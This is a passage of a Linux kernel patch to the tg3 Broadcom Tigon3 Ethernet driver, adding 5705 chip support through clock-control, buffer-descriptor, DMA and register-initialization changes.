tw32(TG3PCI_CLOCK_CTRL, base_val | - CLOCK_CTRL_ALTCLK); - tr32(TG3PCI_CLOCK_CTRL); - udelay(40); + base_val = tp->pci_clock_ctrl; + base_val |= (CLOCK_CTRL_RXCLK_DISABLE | + CLOCK_CTRL_TXCLK_DISABLE); 
tw32(TG3PCI_CLOCK_CTRL, base_val | CLOCK_CTRL_ALTCLK | - CLOCK_CTRL_44MHZ_CORE); - tr32(TG3PCI_CLOCK_CTRL); - udelay(40); - - tw32(TG3PCI_CLOCK_CTRL, base_val | - CLOCK_CTRL_44MHZ_CORE); + CLOCK_CTRL_PWRDOWN_PLL133); tr32(TG3PCI_CLOCK_CTRL); udelay(40); } else { - u32 base_val; + u32 newbits1, newbits2; - base_val = 0; if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) - base_val |= (CLOCK_CTRL_RXCLK_DISABLE | - CLOCK_CTRL_TXCLK_DISABLE); + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { + newbits1 = (CLOCK_CTRL_RXCLK_DISABLE | + CLOCK_CTRL_TXCLK_DISABLE | + CLOCK_CTRL_ALTCLK); + newbits2 = newbits1 | CLOCK_CTRL_44MHZ_CORE; + } else if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + newbits1 = CLOCK_CTRL_625_CORE; + newbits2 = newbits1 | CLOCK_CTRL_ALTCLK; + } else { + newbits1 = CLOCK_CTRL_ALTCLK; + newbits2 = newbits1 | CLOCK_CTRL_44MHZ_CORE; + } - tw32(TG3PCI_CLOCK_CTRL, base_val | - CLOCK_CTRL_ALTCLK | - CLOCK_CTRL_PWRDOWN_PLL133); + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl | newbits1); tr32(TG3PCI_CLOCK_CTRL); udelay(40); - } - if (!(tp->tg3_flags & TG3_FLAG_EEPROM_WRITE_PROT) && - (tp->tg3_flags & TG3_FLAG_WOL_ENABLE)) { - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT0 | - GRC_LCLCTRL_GPIO_OUTPUT1)); - tr32(GRC_LOCAL_CTRL); - udelay(100); - } else { - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT1 | - GRC_LCLCTRL_GPIO_OUTPUT2)); - tr32(GRC_LOCAL_CTRL); - udelay(100); + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl | newbits2); + tr32(TG3PCI_CLOCK_CTRL); + udelay(40); - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT0 | - GRC_LCLCTRL_GPIO_OUTPUT1 | 
- GRC_LCLCTRL_GPIO_OUTPUT2)); - tr32(GRC_LOCAL_CTRL); - udelay(100); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + u32 newbits3; - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT0 | - GRC_LCLCTRL_GPIO_OUTPUT1)); - tr32(GRC_LOCAL_CTRL); - udelay(100); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { + newbits3 = (CLOCK_CTRL_RXCLK_DISABLE | + CLOCK_CTRL_TXCLK_DISABLE | + CLOCK_CTRL_44MHZ_CORE); + } else { + newbits3 = CLOCK_CTRL_44MHZ_CORE; + } + + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl | newbits3); + tr32(TG3PCI_CLOCK_CTRL); + udelay(40); } } + tg3_frob_aux_power(tp); + /* Finally, set the new power state. */ pci_write_config_word(tp->pdev, pm + PCI_PM_CTRL, power_control); @@ -934,11 +1038,10 @@ /* Some third-party PHYs need to be reset on link going * down. - * - * XXX 5705 note: This workaround also applies to 5705_a0 */ if ((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704 || + tp->pci_chip_rev_id == CHIPREV_ID_5705_A0) && netif_carrier_ok(tp->dev)) { tg3_readphy(tp, MII_BMSR, &bmsr); tg3_readphy(tp, MII_BMSR, &bmsr); @@ -1928,7 +2031,7 @@ int received; hw_idx = tp->hw_status->idx[0].rx_producer; - sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE; + sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE(tp); work_mask = 0; received = 0; while (sw_idx != hw_idx && budget > 0) { @@ -2029,13 +2132,13 @@ (*post_ptr)++; next_pkt_nopost: rx_rcb_ptr++; - sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE; + sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE(tp); } /* ACK the status ring. 
*/ tp->rx_rcb_ptr = rx_rcb_ptr; tw32_mailbox(MAILBOX_RCVRET_CON_IDX_0 + TG3_64BIT_REG_LOW, - (rx_rcb_ptr % TG3_RX_RCB_RING_SIZE)); + (rx_rcb_ptr % TG3_RX_RCB_RING_SIZE(tp))); if (tp->tg3_flags & TG3_FLAG_MBOX_WRITE_REORDER) tr32(MAILBOX_RCVRET_CON_IDX_0 + TG3_64BIT_REG_LOW); @@ -2655,7 +2758,7 @@ { struct tg3 *tp = dev->priv; - if (new_mtu < TG3_MIN_MTU || new_mtu > TG3_MAX_MTU) + if (new_mtu < TG3_MIN_MTU || new_mtu > TG3_MAX_MTU(tp)) return -EINVAL; if (!netif_running(dev)) { @@ -2774,7 +2877,7 @@ /* Zero out all descriptors. */ memset(tp->rx_std, 0, TG3_RX_RING_BYTES); memset(tp->rx_jumbo, 0, TG3_RX_JUMBO_RING_BYTES); - memset(tp->rx_rcb, 0, TG3_RX_RCB_RING_BYTES); + memset(tp->rx_rcb, 0, TG3_RX_RCB_RING_BYTES(tp)); if (tp->tg3_flags & TG3_FLAG_HOST_TXDS) { memset(tp->tx_ring, 0, TG3_TX_RING_BYTES); @@ -2857,7 +2960,7 @@ tp->rx_jumbo = NULL; } if (tp->rx_rcb) { - pci_free_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES, + pci_free_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES(tp), tp->rx_rcb, tp->rx_rcb_mapping); tp->rx_rcb = NULL; } @@ -2915,7 +3018,7 @@ if (!tp->rx_jumbo) goto err_out; - tp->rx_rcb = pci_alloc_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES, + tp->rx_rcb = pci_alloc_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES(tp), &tp->rx_rcb_mapping); if (!tp->rx_rcb) goto err_out; @@ -2962,6 +3065,23 @@ unsigned int i; u32 val; + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + switch (ofs) { + case RCVLSC_MODE: + case DMAC_MODE: + case MBFREE_MODE: + case BUFMGR_MODE: + case MEMARB_MODE: + /* We can't enable/disable these bits of the + * 5705, just say success. 
+ */ + return 0; + + default: + break; + }; + } + val = tr32(ofs); val &= ~enable_bit; tw32(ofs, val); @@ -3083,7 +3203,10 @@ tp->tg3_flags &= ~TG3_FLAG_5701_REG_WRITE_BUG; /* do the reset */ - tw32(GRC_MISC_CFG, GRC_MISC_CFG_CORECLK_RESET); + val = GRC_MISC_CFG_CORECLK_RESET; + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + val |= GRC_MISC_CFG_KEEP_GPHY_POWER; + tw32(GRC_MISC_CFG, val); /* restore 5701 hardware bug workaround flag */ tp->tg3_flags = flags_save; @@ -3119,6 +3242,13 @@ tw32(MEMARB_MODE, MEMARB_MODE_ENABLE); + if ((tp->nic_sram_data_cfg & NIC_SRAM_DATA_CFG_MINI_PCI) != 0 && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + tp->pci_clock_ctrl |= + (CLOCK_CTRL_FORCE_CLKRUN | CLOCK_CTRL_CLKRUN_OENABLE); + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl); + } + tw32(TG3PCI_MISC_HOST_CTRL, tp->misc_host_ctrl); } @@ -3317,6 +3447,10 @@ { int i; + if (offset == TX_CPU_BASE && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + BUG(); + tw32(offset + CPU_STATE, 0xffffffff); tw32(offset + CPU_MODE, CPU_MODE_RESET); if (offset == RX_CPU_BASE) { @@ -3367,6 +3501,14 @@ int err, i; u32 orig_tg3_flags = tp->tg3_flags; + if (cpu_base == TX_CPU_BASE && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + printk(KERN_ERR PFX "tg3_load_firmware_cpu: Trying to load " + "TX cpu firmware on %s which is 5705.\n", + tp->dev->name); + return -EINVAL; + } + /* Force use of PCI config space for indirect register * write calls. */ @@ -3746,6 +3888,9 @@ struct fw_info info; int err, i; + /* XXX 5705 note: Need different firmware here, and load it onto + * XXX RX cpu instead of TX cpu as 5705 lacks the latter. 
+ */ info.text_base = TG3_TSO_FW_TEXT_ADDR; info.text_len = TG3_TSO_FW_TEXT_LEN; info.text_data = &tg3TsoFwText[0]; @@ -3815,6 +3960,15 @@ tw32(MAC_ADDR_0_LOW + (i * 8), addr_low); } + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5700 && + GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5701 && + GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + for (i = 0; i < 12; i++) { + tw32(MAC_EXTADDR_0_HIGH + (i * 8), addr_high); + tw32(MAC_EXTADDR_0_LOW + (i * 8), addr_low); + } + } + addr_high = (tp->dev->dev_addr[0] + tp->dev->dev_addr[1] + tp->dev->dev_addr[2] + @@ -3848,23 +4002,19 @@ u32 nic_addr) { tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_HOST_ADDR + - TG3_64BIT_REG_HIGH), + (bdinfo_addr + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_HIGH), ((u64) mapping >> 32)); tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_HOST_ADDR + - TG3_64BIT_REG_LOW), + (bdinfo_addr + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW), ((u64) mapping & 0xffffffff)); tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_MAXLEN_FLAGS), + (bdinfo_addr + TG3_BDINFO_MAXLEN_FLAGS), maxlen_flags); - tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_NIC_ADDR), - nic_addr); + + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tg3_write_mem(tp, + (bdinfo_addr + TG3_BDINFO_NIC_ADDR), + nic_addr); } static void __tg3_set_rx_mode(struct net_device *); @@ -3873,7 +4023,7 @@ static int tg3_reset_hw(struct tg3 *tp) { u32 val; - int i, err; + int i, err, limit; tg3_disable_ints(tp); @@ -3924,9 +4074,8 @@ * B3 tigon3 silicon. This bit has no effect on any * other revision. */ - val = tr32(TG3PCI_CLOCK_CTRL); - val |= CLOCK_CTRL_DELAY_PCI_GRANT; - tw32(TG3PCI_CLOCK_CTRL, val); + tp->pci_clock_ctrl |= CLOCK_CTRL_DELAY_PCI_GRANT; + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl); tr32(TG3PCI_CLOCK_CTRL); if (tp->pci_chip_rev_id == CHIPREV_ID_5704_A0 && @@ -3937,11 +4086,13 @@ } /* Clear statistics/status block in chip, and status block in ram. 
*/ - for (i = NIC_SRAM_STATS_BLK; - i < NIC_SRAM_STATUS_BLK + TG3_HW_STATUS_SIZE; - i += sizeof(u32)) { - tg3_write_mem(tp, i, 0); - udelay(40); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + for (i = NIC_SRAM_STATS_BLK; + i < NIC_SRAM_STATUS_BLK + TG3_HW_STATUS_SIZE; + i += sizeof(u32)) { + tg3_write_mem(tp, i, 0); + udelay(40); + } } memset(tp->hw_status, 0, TG3_HW_STATUS_SIZE); @@ -3972,13 +4123,34 @@ (65 << GRC_MISC_CFG_PRESCALAR_SHIFT)); /* Initialize MBUF/DESC pool. */ - tw32(BUFMGR_MB_POOL_ADDR, NIC_SRAM_MBUF_POOL_BASE); - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) - tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE64); - else - tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE96); - tw32(BUFMGR_DMA_DESC_POOL_ADDR, NIC_SRAM_DMA_DESC_POOL_BASE); - tw32(BUFMGR_DMA_DESC_POOL_SIZE, NIC_SRAM_DMA_DESC_POOL_SIZE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + tw32(BUFMGR_MB_POOL_ADDR, NIC_SRAM_MBUF_POOL_BASE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) + tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE64); + else + tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE96); + tw32(BUFMGR_DMA_DESC_POOL_ADDR, NIC_SRAM_DMA_DESC_POOL_BASE); + tw32(BUFMGR_DMA_DESC_POOL_SIZE, NIC_SRAM_DMA_DESC_POOL_SIZE); + } +#if TG3_DO_TSO != 0 + else if (tp->dev->features & NETIF_F_TSO) { + /* XXX TSO note: Ok, there will be two sets of firmware. + * XXX One for non-5705 and one for 5705 chips. 
+ * XXX Once that is implemented we need to size + * XXX that 5705-specific firmware and use it + * XXX to calculate the proper BUFMGR_MB_POOL_ADDR + * XXX size (NIC_SRAM_MBUF_POOL_BASE5705 + 5705fw_len) + * XXX and BUFMGR_MB_POOL_SIZE value + * XXX (NIC_SRAM_MBUF_POOL_SIZE5705 - 5705fw_len - 0xa00) + */ +#if 0 + fw_len = tg3_tso_fw_len(tp); + fw_len = (fw_len + (0x80 - 1)) & ~(0x80 - 1); + tw32(BUFMGR_MB_POOL_ADDR, NIC_SRAM_MBUF_POOL_BASE5705 + fw_len); + tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE5705 - fw_len - 0xa00); +#endif + } +#endif if (!(tp->tg3_flags & TG3_FLAG_JUMBO_ENABLE)) { tw32(BUFMGR_MB_RDMA_LOW_WATER, @@ -4025,6 +4197,9 @@ return -ENODEV; } + /* Setup replenish threshold. */ + tw32(RCVBDI_STD_THRESH, tp->rx_pending / 8); + /* Initialize TG3_BDINFO's at: * RCVDBDI_STD_BD: standard eth size rx ring * RCVDBDI_JUMBO_BD: jumbo frame rx ring @@ -4046,35 +4221,50 @@ ((u64) tp->rx_std_mapping >> 32)); tw32(RCVDBDI_STD_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW, ((u64) tp->rx_std_mapping & 0xffffffff)); - tw32(RCVDBDI_STD_BD + TG3_BDINFO_MAXLEN_FLAGS, - RX_STD_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); tw32(RCVDBDI_STD_BD + TG3_BDINFO_NIC_ADDR, NIC_SRAM_RX_BUFFER_DESC); - tw32(RCVDBDI_MINI_BD + TG3_BDINFO_MAXLEN_FLAGS, - BDINFO_FLAGS_DISABLED); - - if (tp->tg3_flags & TG3_FLAG_JUMBO_ENABLE) { - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_HIGH, - ((u64) tp->rx_jumbo_mapping >> 32)); - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW, - ((u64) tp->rx_jumbo_mapping & 0xffffffff)); - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, - RX_JUMBO_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_NIC_ADDR, - NIC_SRAM_RX_JUMBO_BUFFER_DESC); + /* Don't even try to program the JUMBO/MINI buffer descriptor + * configs on 5705. 
+ */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + tw32(RCVDBDI_STD_BD + TG3_BDINFO_MAXLEN_FLAGS, + RX_STD_MAX_SIZE_5705 << BDINFO_FLAGS_MAXLEN_SHIFT); } else { - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, + tw32(RCVDBDI_STD_BD + TG3_BDINFO_MAXLEN_FLAGS, + RX_STD_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); + + tw32(RCVDBDI_MINI_BD + TG3_BDINFO_MAXLEN_FLAGS, BDINFO_FLAGS_DISABLED); - } - /* Setup replenish thresholds. */ - tw32(RCVBDI_STD_THRESH, tp->rx_pending / 8); - tw32(RCVBDI_JUMBO_THRESH, tp->rx_jumbo_pending / 8); + /* Setup replenish threshold. */ + tw32(RCVBDI_JUMBO_THRESH, tp->rx_jumbo_pending / 8); - /* Clear out send RCB ring in SRAM. */ - for (i = NIC_SRAM_SEND_RCB; i < NIC_SRAM_RCV_RET_RCB; i += TG3_BDINFO_SIZE) - tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, BDINFO_FLAGS_DISABLED); + if (tp->tg3_flags & TG3_FLAG_JUMBO_ENABLE) { + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_HIGH, + ((u64) tp->rx_jumbo_mapping >> 32)); + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW, + ((u64) tp->rx_jumbo_mapping & 0xffffffff)); + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, + RX_JUMBO_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_NIC_ADDR, + NIC_SRAM_RX_JUMBO_BUFFER_DESC); + } else { + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, + BDINFO_FLAGS_DISABLED); + } + + } + + /* There is only one send ring on 5705, no need to explicitly + * disable the others. + */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + /* Clear out send RCB ring in SRAM. 
*/ + for (i = NIC_SRAM_SEND_RCB; i < NIC_SRAM_RCV_RET_RCB; i += TG3_BDINFO_SIZE) + tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, + BDINFO_FLAGS_DISABLED); + } tp->tx_prod = 0; tp->tx_cons = 0; @@ -4096,9 +4286,15 @@ NIC_SRAM_TX_BUFFER_DESC); } - for (i = NIC_SRAM_RCV_RET_RCB; i < NIC_SRAM_STATS_BLK; i += TG3_BDINFO_SIZE) { - tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, - BDINFO_FLAGS_DISABLED); + /* There is only one receive return ring on 5705, no need to explicitly + * disable the others. + */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + for (i = NIC_SRAM_RCV_RET_RCB; i < NIC_SRAM_STATS_BLK; + i += TG3_BDINFO_SIZE) { + tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, + BDINFO_FLAGS_DISABLED); + } } tp->rx_rcb_ptr = 0; @@ -4108,7 +4304,7 @@ tg3_set_bdinfo(tp, NIC_SRAM_RCV_RET_RCB, tp->rx_rcb_mapping, - (TG3_RX_RCB_RING_SIZE << + (TG3_RX_RCB_RING_SIZE(tp) << BDINFO_FLAGS_MAXLEN_SHIFT), 0); @@ -4162,33 +4358,43 @@ } tw32(HOSTCC_RXCOL_TICKS, 0); - tw32(HOSTCC_RXMAX_FRAMES, 1); - tw32(HOSTCC_RXCOAL_TICK_INT, 0); - tw32(HOSTCC_RXCOAL_MAXF_INT, 1); tw32(HOSTCC_TXCOL_TICKS, LOW_TXCOL_TICKS); + tw32(HOSTCC_RXMAX_FRAMES, 1); tw32(HOSTCC_TXMAX_FRAMES, LOW_RXMAX_FRAMES); - tw32(HOSTCC_TXCOAL_TICK_INT, 0); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(HOSTCC_RXCOAL_TICK_INT, 0); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(HOSTCC_TXCOAL_TICK_INT, 0); + tw32(HOSTCC_RXCOAL_MAXF_INT, 1); tw32(HOSTCC_TXCOAL_MAXF_INT, 0); - tw32(HOSTCC_STAT_COAL_TICKS, - DEFAULT_STAT_COAL_TICKS); - /* Status/statistics block address. 
*/ - tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_HIGH, - ((u64) tp->stats_mapping >> 32)); - tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_LOW, - ((u64) tp->stats_mapping & 0xffffffff)); + /* set status block DMA address */ tw32(HOSTCC_STATUS_BLK_HOST_ADDR + TG3_64BIT_REG_HIGH, ((u64) tp->status_mapping >> 32)); tw32(HOSTCC_STATUS_BLK_HOST_ADDR + TG3_64BIT_REG_LOW, ((u64) tp->status_mapping & 0xffffffff)); - tw32(HOSTCC_STATS_BLK_NIC_ADDR, NIC_SRAM_STATS_BLK); - tw32(HOSTCC_STATUS_BLK_NIC_ADDR, NIC_SRAM_STATUS_BLK); + + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + /* Status/statistics block address. See tg3_timer, + * the tg3_periodic_fetch_stats call there, and + * tg3_get_stats to see how this works for 5705 chips. + */ + tw32(HOSTCC_STAT_COAL_TICKS, + DEFAULT_STAT_COAL_TICKS); + tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_HIGH, + ((u64) tp->stats_mapping >> 32)); + tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_LOW, + ((u64) tp->stats_mapping & 0xffffffff)); + tw32(HOSTCC_STATS_BLK_NIC_ADDR, NIC_SRAM_STATS_BLK); + tw32(HOSTCC_STATUS_BLK_NIC_ADDR, NIC_SRAM_STATUS_BLK); + } tw32(HOSTCC_MODE, HOSTCC_MODE_ENABLE | tp->coalesce_mode); tw32(RCVCC_MODE, RCVCC_MODE_ENABLE | RCVCC_MODE_ATTN_ENABLE); tw32(RCVLPC_MODE, RCVLPC_MODE_ENABLE); - tw32(RCVLSC_MODE, RCVLSC_MODE_ENABLE | RCVLSC_MODE_ATTN_ENABLE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(RCVLSC_MODE, RCVLSC_MODE_ENABLE | RCVLSC_MODE_ATTN_ENABLE); tp->mac_mode = MAC_MODE_TXSTAT_ENABLE | MAC_MODE_RXSTAT_ENABLE | MAC_MODE_TDE_ENABLE | MAC_MODE_RDE_ENABLE | MAC_MODE_FHDE_ENABLE; @@ -4207,26 +4413,36 @@ tw32_mailbox(MAILBOX_INTERRUPT_0 + TG3_64BIT_REG_LOW, 0); tr32(MAILBOX_INTERRUPT_0); - tw32(DMAC_MODE, DMAC_MODE_ENABLE); - tr32(DMAC_MODE); - udelay(40); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + tw32(DMAC_MODE, DMAC_MODE_ENABLE); + tr32(DMAC_MODE); + udelay(40); + } - tw32(WDMAC_MODE, (WDMAC_MODE_ENABLE | WDMAC_MODE_TGTABORT_ENAB | - 
WDMAC_MODE_MSTABORT_ENAB | WDMAC_MODE_PARITYERR_ENAB | - WDMAC_MODE_ADDROFLOW_ENAB | WDMAC_MODE_FIFOOFLOW_ENAB | - WDMAC_MODE_FIFOURUN_ENAB | WDMAC_MODE_FIFOOREAD_ENAB | - WDMAC_MODE_LNGREAD_ENAB)); + val = (WDMAC_MODE_ENABLE | WDMAC_MODE_TGTABORT_ENAB | + WDMAC_MODE_MSTABORT_ENAB | WDMAC_MODE_PARITYERR_ENAB | + WDMAC_MODE_ADDROFLOW_ENAB | WDMAC_MODE_FIFOOFLOW_ENAB | + WDMAC_MODE_FIFOURUN_ENAB | WDMAC_MODE_FIFOOREAD_ENAB | + WDMAC_MODE_LNGREAD_ENAB); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705 && + (tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH) != 0) + val |= WDMAC_MODE_RX_ACCEL; + tw32(WDMAC_MODE, val); tr32(WDMAC_MODE); udelay(40); - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704 && - (tp->tg3_flags & TG3_FLAG_PCIX_MODE)) { + if ((tp->tg3_flags & TG3_FLAG_PCIX_MODE) != 0) { val = tr32(TG3PCI_X_CAPS); - val &= ~(PCIX_CAPS_SPLIT_MASK | PCIX_CAPS_BURST_MASK); - val |= (PCIX_CAPS_MAX_BURST_5704 << PCIX_CAPS_BURST_SHIFT); - if (tp->tg3_flags & TG3_FLAG_SPLIT_MODE) - val |= (tp->split_mode_max_reqs << - PCIX_CAPS_SPLIT_SHIFT); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703) { + val &= ~PCIX_CAPS_BURST_MASK; + val |= (PCIX_CAPS_MAX_BURST_CPIOB << PCIX_CAPS_BURST_SHIFT); + } else if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) { + val &= ~(PCIX_CAPS_SPLIT_MASK | PCIX_CAPS_BURST_MASK); + val |= (PCIX_CAPS_MAX_BURST_CPIOB << PCIX_CAPS_BURST_SHIFT); + if (tp->tg3_flags & TG3_FLAG_SPLIT_MODE) + val |= (tp->split_mode_max_reqs << + PCIX_CAPS_SPLIT_SHIFT); + } tw32(TG3PCI_X_CAPS, val); } @@ -4237,12 +4453,25 @@ RDMAC_MODE_LNGREAD_ENAB); if (tp->tg3_flags & TG3_FLAG_SPLIT_MODE) val |= RDMAC_MODE_SPLIT_ENABLE; + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + if (tp->pci_chip_rev_id != CHIPREV_ID_5705_A0) { +#if TG3_DO_TSO != 0 + if (tp->dev->features & NETIF_F_TSO) { + val |= RDMAC_MODE_FIFO_SIZE_128; + } else +#endif + if (!(tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH)) { + val |= RDMAC_MODE_FIFO_LONG_BURST; + } + } + } 
tw32(RDMAC_MODE, val); tr32(RDMAC_MODE); udelay(40); tw32(RCVDCC_MODE, RCVDCC_MODE_ENABLE | RCVDCC_MODE_ATTN_ENABLE); - tw32(MBFREE_MODE, MBFREE_MODE_ENABLE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(MBFREE_MODE, MBFREE_MODE_ENABLE); tw32(SNDDATAC_MODE, SNDDATAC_MODE_ENABLE); tw32(SNDBDC_MODE, SNDBDC_MODE_ENABLE | SNDBDC_MODE_ATTN_ENABLE); tw32(RCVBDI_MODE, RCVBDI_MODE_ENABLE | RCVBDI_MODE_RCB_ATTN_ENAB); @@ -4323,22 +4552,48 @@ tw32(MAC_RCV_VALUE_0, 0xffffffff & RCV_RULE_DISABLE_MASK); tw32(MAC_RCV_RULE_1, 0x86000004 & RCV_RULE_DISABLE_MASK); tw32(MAC_RCV_VALUE_1, 0xffffffff & RCV_RULE_DISABLE_MASK); -#if 0 - tw32(MAC_RCV_RULE_2, 0); tw32(MAC_RCV_VALUE_2, 0); - tw32(MAC_RCV_RULE_3, 0); tw32(MAC_RCV_VALUE_3, 0); -#endif - tw32(MAC_RCV_RULE_4, 0); tw32(MAC_RCV_VALUE_4, 0); - tw32(MAC_RCV_RULE_5, 0); tw32(MAC_RCV_VALUE_5, 0); - tw32(MAC_RCV_RULE_6, 0); tw32(MAC_RCV_VALUE_6, 0); - tw32(MAC_RCV_RULE_7, 0); tw32(MAC_RCV_VALUE_7, 0); - tw32(MAC_RCV_RULE_8, 0); tw32(MAC_RCV_VALUE_8, 0); - tw32(MAC_RCV_RULE_9, 0); tw32(MAC_RCV_VALUE_9, 0); - tw32(MAC_RCV_RULE_10, 0); tw32(MAC_RCV_VALUE_10, 0); - tw32(MAC_RCV_RULE_11, 0); tw32(MAC_RCV_VALUE_11, 0); - tw32(MAC_RCV_RULE_12, 0); tw32(MAC_RCV_VALUE_12, 0); - tw32(MAC_RCV_RULE_13, 0); tw32(MAC_RCV_VALUE_13, 0); - tw32(MAC_RCV_RULE_14, 0); tw32(MAC_RCV_VALUE_14, 0); - tw32(MAC_RCV_RULE_15, 0); 